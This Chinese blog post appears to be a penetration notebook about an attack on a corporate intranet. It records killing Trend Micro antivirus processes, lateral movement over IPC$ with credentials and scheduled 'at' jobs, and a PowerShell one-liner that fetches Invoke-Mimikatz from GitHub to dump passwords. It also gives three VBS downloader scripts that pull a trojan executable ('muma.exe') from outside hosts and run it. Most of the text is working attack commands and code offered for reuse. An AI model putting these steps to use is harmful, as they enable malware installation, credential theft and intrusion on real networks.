某内网纪实

渗透总结:

环境为172段,拿到shell,补丁全打,站库分离,360分分钟教我做人,上了个大马,net一套命令下来,有域,恰好库在域这个段,此时我想通过mssql执行cmdshell种马(其实通过mssql已经拿到几台服务器了。但是感觉用shell去访问不行)

vbs下载者,bitsadmin下载,ipc链接copy过去,

1.bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip  win03下没有,拷贝win7过去不能使用。

2.vbs下载者 我echo执行所有命令,发现执行超时。趋势科技防火墙,我用system权限,taskkill /f /t /im pid结束进程,结果关闭掉了mssql进程(手误)

大概有四个进程:

NTRtScan.exe 1964 ntrtscan
PccNTMon.exe 3924 暂缺
CNTAoSMgr.exe 296 暂缺
PccNTMon.exe 5452 暂缺

ipc net use \\10.1.111.1\c$ "dc\username" /user:"password" 

copy path\xx.exe \\10.xxxx\c$\xx.exe 

net time \\ip

at time \\ip\C$\x.exe  (典型的手法)

 

接下来的思路:

查看shell进行提权,溢出,mssql,ftp,收集更多的信息,比如mail等

确定控下的这两天内网机器是否存在web,如果是这样就很轻松了。

msf+cobalt strike+veil提权看看

 powershell 抓密码:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:\programdata\pass.txt"

 执行命令:psexec

https://technet.microsoft.com/en-us/sysinternals/bb897553

https://github.com/nick-o/impacket

vbs下载三种版本:

一、VBS下载者:

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.03389.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\zl.exe",2
wscript.sleep 1000
Shell.Run ("c:\zl.exe") '延迟过后执行下载文件


二、cmd下执行的版本:

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.03389.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

三、wget.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

使用方法:cscript wget.vbs http://www.moonsec.com/muma.exe

 

posted @ 2016-10-11 14:13  轻落语  阅读(402)  评论(0编辑  收藏  举报